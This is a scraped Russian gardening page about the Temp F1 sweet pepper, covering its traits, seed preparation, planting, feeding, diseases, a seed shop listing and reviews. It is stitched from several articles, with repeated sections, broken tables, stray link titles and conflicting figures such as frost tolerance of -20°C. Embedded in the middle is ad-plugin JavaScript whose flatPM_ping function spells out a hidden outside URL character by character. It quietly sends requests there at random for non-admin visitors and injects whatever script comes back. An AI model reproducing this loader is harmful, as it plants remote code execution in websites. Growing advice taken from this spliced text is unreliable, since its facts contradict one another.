13 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Характеристика сорта перцев темп

Характеристика сорта перцев Темп

Гибридный перец Темп среднеранний относится к категории пасленовых огородных культур. Он нашел применение как в промышленной, так и в домашней кулинарии.

Характеристика сорта перцев Темп

Характеристика сорта

Перец Темп f1 является скороспелым. От высадки до технической зрелости проходит 85-90 дней. От всходов до биологической зрелости — 100 дней.

Сорт Темп отличается прекрасными вкусовыми качествами, он устойчив к:

  • вредителям и болезням (табачной мозаике, вершинной гнили);
  • резким перепадам температуры (выдерживает до -20°C);
  • засухе или чрезмерной влажности;
  • вертициллезному увяданию и т.д.

Сладкий перец сорта Темп f1 имеет высокий уровень урожайности. В среднем с 1 кв. м собирают от 4 до 6 кг, если овощная культура растет в открытом грунте. Если перец выращивают в теплице или парнике, с 1 кв. м получают до 10 кг плодов.

Описание куста

Согласно описанию, куст обладает рядом особенностей:

  • Средняя высота (60-80 см).
  • Полураскидистость, мощность, хорошая облиственность, не требующая формировки и частых обрезок.
  • Овальная форма листьев, равномерное развитие листовой пластиныю.
  • Бледно-зеленый цвет листьев.

Описание плодов

Сорт Темп ф1 отличается сладкими, сочными плодами. Тип овоща венгерский. Поверхность ребристая, в виде отдельных долек.

Согласно описанию, плоды перца Темп имеют такие характеристики:

  • крупность (вес 1 плода составляет 100-130 г);
  • конусовидная форма;
  • пониклость;
  • мясистость;
  • гладкость;
  • глянцевость.

Толщина стенок — 4-5 мм. Число камер — от 3 до 4. В начале созревания цвет плодов светло-зеленый, в период биологической зрелости — красный.

Перец Темп отлично подходит для свежего употребления и переработки. Его используют для приготовления фаршированного перца, овощного рагу, супов, нарезки для запекания на гриле.

Сладкие плоды используют для холодных летних салатов, овощных смузи, фрешев. Подходят они и для консервации.

Уход за перцем Темп ф1 такой же, как и за другими гибридными сортами. Сначала выбирают семена. После покупки их кладут в воду и оставляют на 5-10 минут. Те семена, что опустятся, можно оставить. Те, что всплывут, необходимо выбросить, т.к. они пустые и не прорастут.

Подготовка семян

Семена обрабатывают марганцовым раствором в профилактических целях. 5 г марганцовки и разводят в 1 л воды. Семена держат в растворе не больше 10-20 минут, после чего моют их и обсушивают.

Посадка

При посадке важно соблюдать дистанцию

Посадку осуществляют по схеме: 5-7 кустов на 1 кв. м. Если увеличить густоту посадки до 8-10 растений, кусты будут давать низкокачественный урожай. Корни будут сплетаться, что снизит устойчивость к заболеваниям и сделает перец Темп более уязвимым.

При посадке соблюдают расстояние в 30 см между кустами и 70 см — между рядами. Шейку растения в землю не углубляют, чтобы не произошло загнивания.

Процедуры по уходу

Название Период или время проведения Описание
Поливы Ранее утро, вечер после захода солнца Поливы осуществляют теплой, отстоянной водой. Периодичность — 2-3 раза в неделю. Проводят поливы только под корень. Все растение опрыскивают способом капельного орошения раз в 2 недели.

В период обильных дождей от дополнительных поливов отказываются. Их осуществляют лишь по мере засыхания почвы. Для перца Темп лучше сухая, чем переувлажненная земля.

Подкормки Перед посевом В землю обязательно вносят древесную золу вместе с коровяком. Каждый компонент берут в количестве 100-150 г и разводят в 10 л воды. Этого хватает для 1 кв. м посадки.
Через 10-14 дней после посадки Если перец выращивают на грядке в открытом грунте, вносят птичий помет в соотношении с водой 1 к 20.

Если овощ выращивают в теплице, вносят 20 г аммиачной селитры, 35 г суперфосфата, 25-30 г сернокислого калия, разводят в 10 л воды. Дают настояться сутки, после чего вносят под корень. Этого раствора хватает для 8-10 кустов.

Спустя 10 дней после второй подкормки Ориентироваться нужно на то, когда образовались завязи на растении. Вносят комплексное удобрение. Оно состоит из 15 г суперфосфата, 10 г аммиачной селитры, 20-30 г калия. Все компоненты разводят в ведре воды. Такого количества раствора хватает для обработки 6-8 насаждений.

Подкормка, приготовленная по этому рецепту, уместна для 4 и 5 подживок, то есть во время созревания. Последнюю подкормку вносят за 14 дней до сбора урожая.

Мульчирование Перед заморозками Эта процедура необходима, чтобы сохранить нормальный уровень влаги в земле и уберечь растение от заморозков зимой. В качестве мульчи берут солому, известь, перегной, мульч-бумагу, траву. При мульчировании корневая система остается целой, а воздухообмен улучшается.
Рыхление почвы Через день после поливов Рыхление необходимо для обогащения земли кислородом, что позитивно отражается на уровне урожайности сорта. Процедуру проводят каждый раз после поливов, чтобы убрать почвенную корку.
Уборка урожая Конец июля – средина августа Необязательно ждать, пока плоды станут ярко-красными. Их срывают, как только размеры будут составлять 100-130 гр.

Рекомендуют собирать плоды 2-3 раза в неделю. Перцы дозревают, если их положить на несколько дней в темное теплое место.

Вредители и болезни

Ошибки в уходе могут стать причиной развития болезней.

Фузариоз

Переизбыток влаги провоцирует появление фузариоза. При поражении листья увядают, приобретают бледный оттенок, прекращается процесс фотосинтеза . Зараженные кусты спасти невозможно, поэтому их вырывают с корнями и сжигают.

Перец темп отзывы фото урожайность

Гибридный перец Темп среднеранний относится к категории пасленовых огородных культур. Он нашел применение как в промышленной, так и в домашней кулинарии.

Характеристика сорта перцев Темп

Характеристика сорта

Перец Темп f1 является скороспелым. От высадки до технической зрелости проходит 85-90 дней. От всходов до биологической зрелости — 100 дней.

Сорт Темп отличается прекрасными вкусовыми качествами, он устойчив к:

  • вредителям и болезням (табачной мозаике, вершинной гнили);
  • резким перепадам температуры (выдерживает до -20°C);
  • засухе или чрезмерной влажности;
  • вертициллезному увяданию и т.д.

Сладкий перец сорта Темп f1 имеет высокий уровень урожайности. В среднем с 1 кв. м собирают от 4 до 6 кг, если овощная культура растет в открытом грунте. Если перец выращивают в теплице или парнике, с 1 кв. м получают до 10 кг плодов.

Описание куста

Согласно описанию, куст обладает рядом особенностей:

  • Средняя высота (60-80 см).
  • Полураскидистость, мощность, хорошая облиственность, не требующая формировки и частых обрезок.
  • Овальная форма листьев, равномерное развитие листовой пластиныю.
  • Бледно-зеленый цвет листьев.

Описание плодов

Сорт Темп ф1 отличается сладкими, сочными плодами. Тип овоща венгерский. Поверхность ребристая, в виде отдельных долек.

Согласно описанию, плоды перца Темп имеют такие характеристики:

  • крупность (вес 1 плода составляет 100-130 г);
  • конусовидная форма;
  • пониклость;
  • мясистость;
  • гладкость;
  • глянцевость.

Толщина стенок — 4-5 мм. Число камер — от 3 до 4. В начале созревания цвет плодов светло-зеленый, в период биологической зрелости — красный.

Перец Темп отлично подходит для свежего употребления и переработки. Его используют для приготовления фаршированного перца, овощного рагу, супов, нарезки для запекания на гриле.

Сладкие плоды используют для холодных летних салатов, овощных смузи, фрешев. Подходят они и для консервации.

Уход за перцем Темп ф1 такой же, как и за другими гибридными сортами. Сначала выбирают семена. После покупки их кладут в воду и оставляют на 5-10 минут. Те семена, что опустятся, можно оставить. Те, что всплывут, необходимо выбросить, т.к. они пустые и не прорастут.

Подготовка семян

Семена обрабатывают марганцовым раствором в профилактических целях. 5 г марганцовки и разводят в 1 л воды. Семена держат в растворе не больше 10-20 минут, после чего моют их и обсушивают.

Посадка

При посадке важно соблюдать дистанцию

Посадку осуществляют по схеме: 5-7 кустов на 1 кв. м. Если увеличить густоту посадки до 8-10 растений, кусты будут давать низкокачественный урожай. Корни будут сплетаться, что снизит устойчивость к заболеваниям и сделает перец Темп более уязвимым.

При посадке соблюдают расстояние в 30 см между кустами и 70 см — между рядами. Шейку растения в землю не углубляют, чтобы не произошло загнивания.

Процедуры по уходу

Название Период или время проведения Описание
Поливы Ранее утро, вечер после захода солнца Поливы осуществляют теплой, отстоянной водой. Периодичность — 2-3 раза в неделю. Проводят поливы только под корень. Все растение опрыскивают способом капельного орошения раз в 2 недели.

В период обильных дождей от дополнительных поливов отказываются. Их осуществляют лишь по мере засыхания почвы. Для перца Темп лучше сухая, чем переувлажненная земля.

Если овощ выращивают в теплице, вносят 20 г аммиачной селитры, 35 г суперфосфата, 25-30 г сернокислого калия, разводят в 10 л воды. Дают настояться сутки, после чего вносят под корень. Этого раствора хватает для 8-10 кустов.

Подкормка, приготовленная по этому рецепту, уместна для 4 и 5 подживок, то есть во время созревания. Последнюю подкормку вносят за 14 дней до сбора урожая.

Рекомендуют собирать плоды 2-3 раза в неделю. Перцы дозревают, если их положить на несколько дней в темное теплое место.

Вредители и болезни

Ошибки в уходе могут стать причиной развития болезней.

Фузариоз

Переизбыток влаги провоцирует появление фузариоза. При поражении листья увядают, приобретают бледный оттенок, прекращается процесс фотосинтеза . Зараженные кусты спасти невозможно, поэтому их вырывают с корнями и сжигают.

Описание сладкого перца Темп F1, отзывы, фото

Раннеспелый, урожайный, крупноплодный гибрид болгарского перца для открытого грунта и пленочных укрытий. Период от всходов до начала созревания составляет 100-105 дней.

Куст полураскидистый, высотой около 60 см. Лист среднего размера. Формирование этого перца заключается в удалении боковых побегов и листьев до первой развилки.

Характеристика плодов

Расположение перцев на кусте пониклое. Они конусовидные, гладкие, глянцевые, в стадии технической спелости — желтоватые или светло-зеленые, в биологической — красные, весом 100-120 грамм. Толщина стенки 4-5 мм, число камер 3-4. Этот перец отлично подходит для фарширования. Хорош он также для свежего употребления, домашней кулинарии, консервирования. Вкусен даже в технической спелости.

Достоинства гибрида: дружное созревание плодов, жаростойкость, засухоустойчивость. Сладкий перец Темп устойчив к вершинной гнили плодов и вирусу томатной мозаики, толерантен к вертициллезному увяданию.

Урожайность в открытом грунте 4-6 кг/м2, в защищенном 8-9 кг/м2.
к содержанию ↑

Особенности выращивания, посадка и уход

Посев семян перца на рассаду проводят за 60-70 дней до предполагаемой высадки растений на постоянное место. Оптимальная температура прорастания семян 25-26°С.

При появлении на растениях настоящих листочков их пересаживают по отдельным стаканчикам емкостью 0,3-0,5 литра.

Перец не любит пересадку, поэтому не удивляйтесь, если после того, как вы рассадили сеянцы по отдельным емкостям, они на время остановятся в росте. Можно немного «сгладить» стрессовое состояние, опрыскав растения препаратом Эпин.

Огородники с опытом предпочитают выращивать гибридные перцы: они приносят значительный урожай и требуют намного меньше внимания, чем сортовые формы. Одна из подобных новинок – Темп F1. Подробное описание, преимущества в сравнении с другими сортами, а также отзывы размещены в статье.

Как выглядит гибрид

Перец Темп F1 появился на рынке совсем недавно. Над его созданием успешно потрудились отечественные селекционеры.

Общий вид растения:

16 отличных сортов слив для Подмосковья

  1. Куст до 90 см в высоту, сильно разветвленный.
  2. Листьев на стеблях много. Пластины большие, темно зеленые.
  3. Плоды конусовидной формы.
  4. Средний вес перчин 120 г.
  5. Технически созревшие единицы светло-зеленого оттенка или воскового
  6. Биологически дозревший перец красный (на фото).

В разрезе видны 3 камеры, заполненные небольшим количеством семян. Стенки не выделяются толщиной – до 5 мм. Вкусовые качества оцениваются дегустаторами на отлично.

Подкормки Перед посевом В землю обязательно вносят древесную золу вместе с коровяком. Каждый компонент берут в количестве 100-150 г и разводят в 10 л воды. Этого хватает для 1 кв. м посадки.
Через 10-14 дней после посадки Если перец выращивают на грядке в открытом грунте, вносят птичий помет в соотношении с водой 1 к 20.
Спустя 10 дней после второй подкормки Ориентироваться нужно на то, когда образовались завязи на растении. Вносят комплексное удобрение. Оно состоит из 15 г суперфосфата, 10 г аммиачной селитры, 20-30 г калия. Все компоненты разводят в ведре воды. Такого количества раствора хватает для обработки 6-8 насаждений.
Мульчирование Перед заморозками Эта процедура необходима, чтобы сохранить нормальный уровень влаги в земле и уберечь растение от заморозков зимой. В качестве мульчи берут солому, известь, перегной, мульч-бумагу, траву. При мульчировании корневая система остается целой, а воздухообмен улучшается.
Рыхление почвы Через день после поливов Рыхление необходимо для обогащения земли кислородом, что позитивно отражается на уровне урожайности сорта. Процедуру проводят каждый раз после поливов, чтобы убрать почвенную корку.
Уборка урожая Конец июля – средина августа Необязательно ждать, пока плоды станут ярко-красными. Их срывают, как только размеры будут составлять 100-130 гр.
Тип роста, высота куста Полураскидистый, 60-70 см
Цвет зрелого плода Ярко-красный
Схема посадки 50х70 см
Вес, длина и форма плода 120 г, 16-18 см, конусовидный
Срок созревания, урожайность Раннеспелый (110-115 дней). В теплице 7,5 – 9 кг/м 2 . В ОГ 5-6 кг/м 2
Место высадки ОГ/парник/теплица
Болезни Устойчив к вершинной гнили, вирусу табачной мозаики, толерантен к вертициллезному увяданию
По типу использования Универсальный
Тип цветения Женский

Преимущества и недостатки

  1. Перец наделен стойким иммунитетом к большинству болезней пасленовых.
  2. Гибрид хорошо себя чувствует в любой климатической зоне.
  3. Созревание плодов происходит дружно. Это облегчает уборку урожая.
  4. Непродолжительное отсутствие полива никак не влияет на образование завязи.
  5. Высокая урожайность. За сезон каждый куст приносит до 2 кг.

Явных недостатков, в сравнении с другими сортами, перец не имеет.

Особенности агротехники

К выращиванию рассады приступают в конце февраля. Семена заделывают в рыхлый и питательный грунт на глубину 1 см. После появления на сеянцах постоянных листочков выполняют пикировку.

Внимание! Перец плохо реагирует на пересадку, поэтому после процедуры растения на время останавливают рост.

В мае рассаду переносят на постоянное место. На 1 м2 размещают не более 5 растений. Первое время посадки прикрывают. В течение вегетации перец 2 раза в неделю поливают теплой водой. Подкармливают 3 раза за сезон.

Дизайн цветочной клумбы. ТОП-10 простых и эффективных приемов

Посев семян на рассаду
Высадка рассады в парник/теплицу
Посадка рассады в ОГ
Пасынкование
Сбор урожая (в теплице / в ОГ)
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Конец февраля Середина мая Начало июня После 4 листа Конец июня — июль

Перец сладкий Темп F1 производится компаниями «Партнер», «Уральский дачник», «Семко». Семена гибрида необходимо покупать у производителей, их самостоятельный сбор невозможен.

Перец выращивается в открытом и закрытом грунте. В незащищенных грядках он приносит меньше плодов, но в остальном хорошо приживается в средней полосе и на юге. При желании можно перец можно выращивать и на балконе.

Созревание раннее – 100-105 дней от первых всходов. Куст вырастает до 60-70 см, облиствен средне, листья темно-зеленые.

Плоды конусовидные, пониклые, выровненные. Их масса 100-120 г, в полной спелости цвет красный. Внутри 3-4 гнезда. Стенки средние – 4-5 мм. Вкус приятный, мякоть плотная, упругая, хрустящая и сочная, с выраженным ароматом. Использование универсальное.

Преимущества и недостатки

  • простота в выращивании;
  • универсальность в выборе места для высадки;
  • прекрасный вкус;
  • хорошая урожайность;
  • универсальное применение;
  • транспортабельность плодов и способность долго храниться.

Минусы:

  • семена, собранные из плодов гибрида, не сохраняют его качеств.

Урожайность

В теплице с 1 кв. м можно получить 8-9 кг плодов, а в открытом грунте — 4-6 кг.

Посадка

Для перца с осени готовят участок или теплицу. В открытом грунте выбирают участок на возвышенности, в солнечном месте, вдали от других пасленовых, особенно острого перца. Оптимальные предшественники – лук, морковь, капуста, бобовые и зерновые культуры, редька, редис, тыква, кабачки, укроп, чеснок.

Грядку осенью глубоко вскапывают, попутно очищая от остатков старой ботвы, корней и сорняков. Вносят минеральные и органические удобрения (не менее 5 кг компоста на 1 кв. м или минеральные комплексы по инструкции). Весной повторно перекапывают участок.

В теплице заменяют верхние 7 см почвы, дезинфицируют ее, проливая раствором фунгицида или марганцовки. Все поверхности протирают антисептиком.

Для рассады готовят питательный грунт из смеси земли с участка, торфа и песка. Песок можно заменить опилками или вермикулитом. На каждые 5 кг почвы добавляют 100 г древесной золы и по 5-10 г карбамида, суперфосфата и хлористого калия. Дезинфицируют самодельную смесь одним из методов:

  1. Прокаливают в духовке при температуре +100-110 градусов полчаса.
  2. Выставляют на мороз и дают промерзнуть насквозь.
  3. Проливают кипятком.
  4. Обрабатывают раствором марганцовки.

Измеряют кислотность и вносят гашеную известь или доломитовую муку, если рН превышает 6,4.

Семена готовят, замачивая в слабом розовом растворе марганцовки в течение получаса. Это защитит от вирусов и бактерий. Затем обрабатывают стимулятором, например, «Цирконом». Потом высаживают в бороздки глубиной 1 см в общие емкости или сеют по 1-2 семечка в индивидуальные горшочки.

Политые посевы накрывают пленкой и ставят в хорошо освещенное теплое место с температурой +23-28. Когда появятся ростки, обеспечивают такие условия:

  • освещение 12-16 часов в сутки (если дневного света не хватает, устанавливают фитолампы);
  • дневная температура +20-25;
  • ночная +18-20.

Пикируют по отдельным емкостям в фазе 2 настоящих листьев.

За 2 недели до высадки на участок рассаду закаливают. Сначала выносят ее на улицу на 15-20 минут в день, со временем срок пребывания увеличивают.

Высаживают до 5 кустиков на 1 кв. м.

Выращивание и уход

Гибриду нужен полив, прополка сорняков, рыхление почвы, профилактика вредителей и заболеваний, сбалансированные подкормки.

Поливают теплой водой в то время, когда на куст не попадают прямые солнечные лучи, но лучше по вечерам. Частота – 1-2 раза в неделю, но по необходимости можно чаще.

Когда растения укоренятся, вокруг них рыхлят грунт после каждого полива или при прополке.

Подкармливают трижды. До начала цветения вносят раствор коровяка с минеральными удобрениями или минеральные комплексы с азотом, калием и фосфором. Во время цветения и плодоношения в подкормках должен преобладать калий и фосфор.

Перец Темп: характеристика и описание сорта, фото, отзывы, урожайность, достоинства и недостатки

Описание сорта

Характеристика плодов

Далее представлены фото перца Темп :







Достоинства и недостатки

У этого сорта перцев есть свои достоинства, среди которых можно выделить основные:

Применение

Особенности выращивания

Посмотрите видео! перец Темп

Отзывы, кто сажал

Ниже приведены отзывы тех, кто сажал перец Темп . Прочитав их, вы поймете все достоинства сорта и секреты его выращивания.

Алёна, г.Москва

Ада, г.Сочи

Ника, г.Владимир

Элина, г.Севастополь

Наталья, г.Екатеринбург

Виталия, г.Кемерово

Ирина, г.Казань

Если статья была полезна, поставь 5 звездочек!

(1 оценок, среднее: 5,00 из 5)

Партнер Перец ТЕМП F1 ^(10шт) 2-ной пак

Гибрид скороспелый. От всходов до технической спелости 85-95 дней, биологической — 100-105 дней. Растение полураскидистое, высотой 60-70 см. Плоды конусовидные, пониклые, гладкие, глянцевые, в технической спелости — светло-зелёного цвета, в биологической — красные. Масса плода 100-120 г, толщина стенки 4-5 мм, число камер 3-4. Дружно созревающий. Высокая жаростойкость и засухоустойчивость. Вкусовые качества отличные, товарность высокая. Рекомендуется для выращивания в открытом и защищенном грунте. Используется в свежем виде, домашней кулинарии, консервировании и промышленной переработке, как в технической, так и биологической спелости. Гибрид устойчив к вершинной гнили плодов, вирусу табачной мозаики, толерантен к вертициллёзному увяданию. Высевать только пророщенные семена. Плотность посадки 4-5 растений/м2. Урожайность в открытом грунте до 6 кг/м2, в защищенном 8-9 кг/м2.

Партнер Перец ТЕМП F1 ^(10шт) 2-ной пак Видео

Партнер Перец ТЕМП F1 ^(10шт) 2-ной пак Фото

Партнер Перец ТЕМП F1 ^(10шт) 2-ной пак Характеристики

Семена Партнер Перец ТЕМП F1 ^(10шт) 2-ной пак можно купить в нашем интернет-магазине по цене 55 руб. с доставкой почтой России и оплатой наличными при получении заказа (наложенным платежом). Где купить Партнер Перец ТЕМП F1 ^(10шт) 2-ной пак самостоятельно в официальном розничном магазине или магазинах партнеров, смотрите на странице. Как купить семена оптом — в разделе «Оптовым покупателям» и профессиональные семена. При возникновении вопросов, звоните по телефону: +7 (499) 677-62-42

Партнер Перец ТЕМП F1 ^(10шт) 2-ной пак Отзывы

Здравствуйте, не могу не написать, потрясающие перцы, рассада крепкая. По сравнению с магазинными покупными в разы отличается. Еще раз спасибо, ждем урожая!

Перчик отличный!Но не для фаршировки, туда же пол кило фарша влезет!

Николай Петрович! Перчики просто мечта огородника!

Надежда Тверская область.
Прекрасный ранний сорт. Большое количество плодов на растении. После первого съема плодов происходит быстрое нарастание второй волны.
Очень довольна что приобрела семена.

Надежда Геннадьевна, спасибо Вам за отзыв!

Партнер Перец ТЕМП F1 ^(10шт) 2-ной пак Полное описание

Если вы давно находитесь в поисках урожайного и скороспелого перца для своего участка, то обратите внимание на семена гибрида Темп F1. Это скороспелый, неприхотливый и высокоурожайный перец, который обязательно станет вашим любимцем.

Описание

С момента высадки до сбора урожая проходит около 90-100 дней. С одного квадратного метра можно собрать до шести килограммов при выращивании в открытом грунте, и до десяти килограммов при выращивании в теплицах.

Отличительные преимущества гибрида заключаются в следующем:

· Вкусовые качества – сочный и мясистый в меру сладкий с характерным ароматом перца. Идеален для употребления в свежем виде, консервирования, приготовления блюд, в состав которых входит перец, фаршировки, цельноплодного запекания и жарки.

· Устойчив к поражению табачной мозаикой и вершинной гнилью.

· Хорошо переносит перепады температур.

· Стойко переносит как засуху, так и чрезмерную влажность климата.

В высоту куст достигает восьмидесяти сантиметров. Очень урожайный. Плоды выровненные, с красивым глянцем. Вес в среднем составляет 115 грамм. Перец Темп имеет не слишком толстую стенку, всего 4-5 мм, но он сочный, хрустящий и сладкий, красивого красного цвета и универсальной конусообразной формы.

Особенности выращивания и ухода

Как мы писали выше, в целом, этот гибрид неприхотлив. Выращивать его нужно через рассаду, так как несмотря на относительную, по сравнению с другими перцами, раннеспелость, сбор урожая возможен только через 90 дней от всходов, а это все-таки срок немалый, учитывая непродолжительный теплый период года. Мы настоятельно советуем семена всех перцев, в том числе и перца Темп, предварительно проращивать. Оптимальные условия для прорастания семян перца — это температура примерно 28 градусов, постоянно влажная среда (подчеркиваем именно влажная! семена не должны лежать в воде) и темнота. В таких условиях семена могут прорасти на 5-й — 7-й день. Стоит помнить, что чем ниже температура, тем более длительный период прорастания, а при температуре ниже 15 градусов семена могут вообще не прорасти. После того, как семена наклюнутся, каждое семя высаживается в отдельную емкость объемом желательно не менее 0,4 л. Емкости лучше сразу разместить под источником дополнительного освещения, чтобы не пропустить момент всходов и не допустить вытягивания растений. Для перца необходима досветка продолжительностью 14 — 16 часов в сутки. Минимально допустимая освещенность — 6000 люкс. Рассада в возрасте 65 — 70дней готова к высадке в грунт. Если высадка в грунт задерживается, и наступает период цветения, то цветки стоит удалять.

Рекомендуемая для этого перца схема посадки — 4-5 растений на 1 квадратный метр. Кусты желательно формировать, оставляя не более пяти стеблей, чтобы не перегружать растение, иначе плоды мельчают. Остальные побеги либо полностью удалять, либо прищипывать, оставив один плодик и после него два листа. Из-за обилия плодов необходима фиксация всех стеблей к опоре, иначе можно потерять часть урожая из-за того, что перегруженные плодами стебли будут ломаться.

Почву под посадку перца стоит подготовить заранее, внеся разрыхляющие, раскисляющие и восстанавливающие плодородие компоненты. Грунт должен быть воздухо- и водопроницаемым и питательным. И конечно, стоит соблюдать посевооборот, избегая высадки перца на те участки, на которые в прошлом сезоне высаживались пасленовые культруры.

В период вегетации желательно проводить подкормки. На стадии роста — удобрениями с преимущественным содержанием азота, на стадии цветения и плодоношения — с преимущественным содержанием калия и фосфора. Но в любом случае при подкормке желательно давать растению комплекс микроэлементов.

Своевременный сбор урожая стимулирует новое плодообразование и созревание оставшихся на кусте плодов.

